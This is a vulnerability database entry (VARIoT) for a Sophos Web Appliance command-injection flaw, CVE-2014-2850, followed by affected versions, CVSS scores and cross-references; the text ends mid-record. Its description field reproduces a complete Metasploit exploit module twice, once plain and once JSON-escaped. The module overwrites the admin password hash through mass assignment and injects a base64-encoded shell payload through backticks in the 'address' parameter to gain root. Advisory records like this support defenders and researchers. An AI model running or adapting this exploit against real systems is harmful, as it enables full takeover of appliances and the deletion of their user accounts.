var-201404-0453
Vulnerability from variot
The network interface configuration page (netinterface) in Sophos Web Appliance before 3.8.2 allows remote administrators to execute arbitrary commands via shell metacharacters in the address parameter. Sophos Web Appliance is prone to a privilege-escalation vulnerability and remote code-execution vulnerability. Attackers can leverage these issues to gain root privileges and execute arbitrary code. Successfully exploiting these issues will result in the complete compromise of affected computers. Versions prior to Sophos Web Appliance 3.8.2 are vulnerable. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. ##
This module requires Metasploit: http//metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) super(update_info(info, 'Name' => 'Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution', 'Description' => %q{ This module takes advantage of two vulnerabilities in order to gain remote code execution as root as an otherwise non-privileged authorized user. By taking advantage of a mass assignment vulnerability that allows an unprivileged authenticated user to change the admininistrator's password hash, the module updates the password to login as the admin to reach the second vulnerability. No server-side sanitization is done on values passed when configuring a static network interface. This module will inadvertently delete any other users that may have been present as a side effect of changing the admin's password. }, 'Author' => [ 'Brandon Perry bperry.volatile@gmail.com' # discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-069/'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => true, 'Payload' => { 'Space' => 500, 'DisableNops' => true, 'BadChars' => "", #base64 encryption ftw! 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet' } }, 'Targets' => [ [ 'Sophos Web Protection Appliance 3.8.1.1', { }] ], 'DefaultOptions' => { 'SSL' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 8 2014' ))
register_options(
[
OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
OptString.new('PASSWORD', [true, 'The password to authenticate with', nil]),
OptString.new('TARGETURI', [true, 'The target URI', '/']),
Opt::RPORT(443)
],
self.class
)
end
def exploit init = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php') })
if !init or !init.body
fail_with("Could not connect to host")
end
print_status("Getting STYLE key...")
style = ''
init.body.each_line do |line|
next if line !~ /name="STYLE" value="(.*)"/
style = $1
end
if style == ''
fail_with("Could not find style key.")
end
post = {
'STYLE' => style,
'destination' => '',
'section' => '',
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
print_status("Authenticating as " + datastore['USERNAME'])
login = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/index.php?c=login'),
'method' => 'POST',
'vars_post' => post
})
if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/
fail_with("Authentication failed")
end
#I don't know what salt is being used to hash these
#passwords (probably in js somewhere), so I have
#to use a static one that I saw being POSTed while
#exploring, it is 'notpassword'.
#
#This will actually delete every other user that exists
#except for admin, whose password will be changed
#
#whoops
admin_hash = '[{"id": "default_admin", "username": "admin", "name": "Default Administrator"'
admin_hash << ', "password": "70ec23d3e019a307081732c0162b2733", "description": "Default '
admin_hash << 'Administrator Account", "admin": true, "roles": ["admin"], "reporting_groups"'
admin_hash << ': [], "user_id": 0}]'
post = {
'action' => 'save',
'STYLE' => style,
'username' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['USERNAME'])),
'current' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
'new' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
'admins' => admin_hash
}
print_status("Changing old password hash to notpassword")
passchange = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/index.php?c=change_password'),
'method' => 'POST',
'vars_post' => post
})
if !passchange or passchange.code != 200
fail_with("Couldn't update admin's password")
end
print_status("Logging in as the admin now")
init = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php')
})
if !init or init.code != 200
fail_with("Couldn't reget index page for admin auth")
end
init.body.each_line do |line|
next if line !~ /name="STYLE" value="(.*)"/
style = $1
end
post = {
'STYLE' => style,
'destination' => '',
'section' => '',
'username' => 'admin',
'password' => 'notpassword'
}
login = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php?c=login'),
'method' => 'POST',
'vars_post' => post
})
if !login or login.code != 200 or login.body !~ /admin<\/a>/
fail_with("Couldn't login as admin")
end
pay = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded))
post = {
'STYLE' => style,
'dhcp' => 'no',
'address' => "192.16`echo #{pay}|base64 --decode|sh`8.1.16",
'gateway' => '192.168.1.254',
'sb_bridge' => 'explicit',
'netmask' => '255.255.255.0',
'sb_linktype' => 'auto',
'dns' => 'yes',
'dns1' => '192.168.1.254',
'dns2' => '',
'dns3' => ''
}
print_status("Sending payload")
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php?c=netinterface'),
'method' => 'POST',
'vars_post' => post,
})
end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201404-0453",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.2.3"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.2.5"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.2.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.2.4"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.1.4"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.2.6"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.2.2"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.1.3"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.2.2.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.2.7"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.5.2"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.4.2"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.2.3"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.3"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.2.4.0"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.0"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.0"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.1.0.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.2"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.0"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.5.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.8"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.5.1.2"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.5.1.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.2"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.8.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.9.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.2"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.1.0"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.0.0"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.5.3"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.4.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.8.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.6.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.5.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.5.0"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.2"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.8.2"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.3"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.5"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.7"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.3"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.6"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.5"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.4"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.0.5"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.3.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.0.1.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.5"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.6"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.3.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.5.6"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.3"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.0.2"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.4"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.7"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.8"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.2.4.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.4"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": null
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.1.1"
},
{
"model": "web appliance",
"scope": "lte",
"trust": 1.0,
"vendor": "sophos",
"version": "3.8.1.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.1.2"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.5.4"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.4"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.0.5.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.6"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.2.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.5.5"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.8.0"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.1.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.9"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.0.4"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.0.1"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.0.3"
},
{
"model": "web appliance",
"scope": null,
"trust": 0.8,
"vendor": "sophos",
"version": null
},
{
"model": "web appliance",
"scope": "lt",
"trust": 0.8,
"vendor": "sophos",
"version": "3.8.2"
},
{
"model": "web appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "sophos",
"version": "3.0"
}
],
"sources": [
{
"db": "BID",
"id": "66734"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002001"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-158"
},
{
"db": "NVD",
"id": "CVE-2014-2850"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:sophos:web_appliance",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:sophos:web_appliance_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002001"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Brandon Perry",
"sources": [
{
"db": "BID",
"id": "66734"
},
{
"db": "PACKETSTORM",
"id": "126099"
}
],
"trust": 0.4
},
"cve": "CVE-2014-2850",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 8.5,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.8,
"id": "CVE-2014-2850",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 8.5,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.8,
"id": "VHN-70789",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-2850",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2014-2850",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201404-158",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-70789",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-70789"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002001"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-158"
},
{
"db": "NVD",
"id": "CVE-2014-2850"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The network interface configuration page (netinterface) in Sophos Web Appliance before 3.8.2 allows remote administrators to execute arbitrary commands via shell metacharacters in the address parameter. Sophos Web Appliance is prone to a privilege-escalation vulnerability and remote code-execution vulnerability. \nAttackers can leverage these issues to gain root privileges and execute arbitrary code. Successfully exploiting these issues will result in the complete compromise of affected computers. \nVersions prior to Sophos Web Appliance 3.8.2 are vulnerable. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. ##\n# This module requires Metasploit: http//metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire \u0027msf/core\u0027\n\nclass Metasploit3 \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n \u0027Name\u0027 =\u003e \u0027Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module takes advantage of two vulnerabilities in order to gain remote code execution as root\n as an otherwise non-privileged authorized user. By taking advantage of a mass assignment\n vulnerability that allows an unprivileged authenticated user to change the admininistrator\u0027s\n password hash, the module updates the password to login as the admin to reach the second vulnerability. \n No server-side sanitization is done on values passed when configuring a static network interface. This module will inadvertently delete\n any other users that may have been present as a side effect of changing the admin\u0027s password. \n },\n \u0027Author\u0027 =\u003e\n [\n \u0027Brandon Perry \u003cbperry.volatile@gmail.com\u003e\u0027 # discovery and Metasploit module\n ],\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027References\u0027 =\u003e\n [\n [\u0027URL\u0027, \u0027http://www.zerodayinitiative.com/advisories/ZDI-14-069/\u0027]\n ],\n \u0027Platform\u0027 =\u003e [\u0027unix\u0027],\n \u0027Arch\u0027 =\u003e ARCH_CMD,\n \u0027Privileged\u0027 =\u003e true,\n \u0027Payload\u0027 =\u003e\n {\n \u0027Space\u0027 =\u003e 500,\n \u0027DisableNops\u0027 =\u003e true,\n \u0027BadChars\u0027 =\u003e \"\", #base64 encryption ftw!\n \u0027Compat\u0027 =\u003e\n {\n \u0027PayloadType\u0027 =\u003e \u0027cmd\u0027,\n \u0027RequiredCmd\u0027 =\u003e \u0027generic telnet\u0027\n }\n },\n \u0027Targets\u0027 =\u003e\n [\n [ \u0027Sophos Web Protection Appliance 3.8.1.1\u0027, { }]\n ],\n \u0027DefaultOptions\u0027 =\u003e\n {\n \u0027SSL\u0027 =\u003e true\n },\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027DisclosureDate\u0027 =\u003e \u0027Apr 8 2014\u0027\n ))\n\n register_options(\n [\n OptString.new(\u0027USERNAME\u0027, [true, \u0027The username to authenticate as\u0027, nil]),\n OptString.new(\u0027PASSWORD\u0027, [true, \u0027The password to authenticate with\u0027, nil]),\n OptString.new(\u0027TARGETURI\u0027, [true, \u0027The target URI\u0027, \u0027/\u0027]),\n Opt::RPORT(443)\n ],\n self.class\n )\n end\n\n def exploit\n init = send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027index.php\u0027)\n })\n\n if !init or !init.body\n fail_with(\"Could not connect to host\")\n end\n\n print_status(\"Getting STYLE key...\")\n\n style = \u0027\u0027\n init.body.each_line do |line|\n next if line !~ /name=\"STYLE\" value=\"(.*)\"/\n style = $1\n end\n\n if style == \u0027\u0027\n fail_with(\"Could not find style key.\")\n end\n\n post = {\n \u0027STYLE\u0027 =\u003e style,\n \u0027destination\u0027 =\u003e \u0027\u0027,\n \u0027section\u0027 =\u003e \u0027\u0027,\n \u0027username\u0027 =\u003e datastore[\u0027USERNAME\u0027],\n \u0027password\u0027 =\u003e datastore[\u0027PASSWORD\u0027]\n }\n\n print_status(\"Authenticating as \" + datastore[\u0027USERNAME\u0027])\n login = send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027/index.php?c=login\u0027),\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027vars_post\u0027 =\u003e post\n })\n\n if !login or login.code != 200 or login.body !~ /#{datastore[\u0027USERNAME\u0027]}\u003c\\/a\u003e/\n fail_with(\"Authentication failed\")\n end\n\n #I don\u0027t know what salt is being used to hash these\n #passwords (probably in js somewhere), so I have\n #to use a static one that I saw being POSTed while\n #exploring, it is \u0027notpassword\u0027. \n #\n #This will actually delete every other user that exists\n #except for admin, whose password will be changed\n #\n #whoops\n admin_hash = \u0027[{\"id\": \"default_admin\", \"username\": \"admin\", \"name\": \"Default Administrator\"\u0027\n admin_hash \u003c\u003c \u0027, \"password\": \"70ec23d3e019a307081732c0162b2733\", \"description\": \"Default \u0027\n admin_hash \u003c\u003c \u0027Administrator Account\", \"admin\": true, \"roles\": [\"admin\"], \"reporting_groups\"\u0027\n admin_hash \u003c\u003c \u0027: [], \"user_id\": 0}]\u0027\n\n post = {\n \u0027action\u0027 =\u003e \u0027save\u0027,\n \u0027STYLE\u0027 =\u003e style,\n \u0027username\u0027 =\u003e Rex::Text.uri_encode(Rex::Text.encode_base64(datastore[\u0027USERNAME\u0027])),\n \u0027current\u0027 =\u003e Rex::Text.uri_encode(Rex::Text.encode_base64(datastore[\u0027PASSWORD\u0027])),\n \u0027new\u0027 =\u003e Rex::Text.uri_encode(Rex::Text.encode_base64(datastore[\u0027PASSWORD\u0027])),\n \u0027admins\u0027 =\u003e admin_hash\n }\n\n print_status(\"Changing old password hash to notpassword\")\n passchange = send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027/index.php?c=change_password\u0027),\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027vars_post\u0027 =\u003e post\n })\n\n if !passchange or passchange.code != 200\n fail_with(\"Couldn\u0027t update admin\u0027s password\")\n end\n\n print_status(\"Logging in as the admin now\")\n init = send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027index.php\u0027)\n })\n\n if !init or init.code != 200\n fail_with(\"Couldn\u0027t reget index page for admin auth\")\n end\n\n init.body.each_line do |line|\n next if line !~ /name=\"STYLE\" value=\"(.*)\"/\n style = $1\n end\n\n post = {\n \u0027STYLE\u0027 =\u003e style,\n \u0027destination\u0027 =\u003e \u0027\u0027,\n \u0027section\u0027 =\u003e \u0027\u0027,\n \u0027username\u0027 =\u003e \u0027admin\u0027,\n \u0027password\u0027 =\u003e \u0027notpassword\u0027\n }\n\n login = send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027index.php?c=login\u0027),\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027vars_post\u0027 =\u003e post\n })\n\n if !login or login.code != 200 or login.body !~ /admin\u003c\\/a\u003e/\n fail_with(\"Couldn\u0027t login as admin\")\n end\n\n pay = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded))\n post = {\n \u0027STYLE\u0027 =\u003e style,\n \u0027dhcp\u0027 =\u003e \u0027no\u0027,\n \u0027address\u0027 =\u003e \"192.16`echo #{pay}|base64 --decode|sh`8.1.16\",\n \u0027gateway\u0027 =\u003e \u0027192.168.1.254\u0027,\n \u0027sb_bridge\u0027 =\u003e \u0027explicit\u0027,\n \u0027netmask\u0027 =\u003e \u0027255.255.255.0\u0027,\n \u0027sb_linktype\u0027 =\u003e \u0027auto\u0027,\n \u0027dns\u0027 =\u003e \u0027yes\u0027,\n \u0027dns1\u0027 =\u003e \u0027192.168.1.254\u0027,\n \u0027dns2\u0027 =\u003e \u0027\u0027,\n \u0027dns3\u0027 =\u003e \u0027\u0027\n }\n\n print_status(\"Sending payload\")\n send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027index.php?c=netinterface\u0027),\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027vars_post\u0027 =\u003e post,\n })\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-2850"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002001"
},
{
"db": "BID",
"id": "66734"
},
{
"db": "VULHUB",
"id": "VHN-70789"
},
{
"db": "PACKETSTORM",
"id": "126099"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-70789",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-70789"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-2850",
"trust": 2.8
},
{
"db": "BID",
"id": "66734",
"trust": 2.0
},
{
"db": "ZDI",
"id": "ZDI-14-069",
"trust": 1.8
},
{
"db": "EXPLOIT-DB",
"id": "32789",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "57706",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002001",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201404-158",
"trust": 0.7
},
{
"db": "SEEBUG",
"id": "SSVID-86059",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-70789",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126099",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-70789"
},
{
"db": "BID",
"id": "66734"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002001"
},
{
"db": "PACKETSTORM",
"id": "126099"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-158"
},
{
"db": "NVD",
"id": "CVE-2014-2850"
}
]
},
"id": "VAR-201404-0453",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-70789"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:08:21.313000Z",
"patch": {
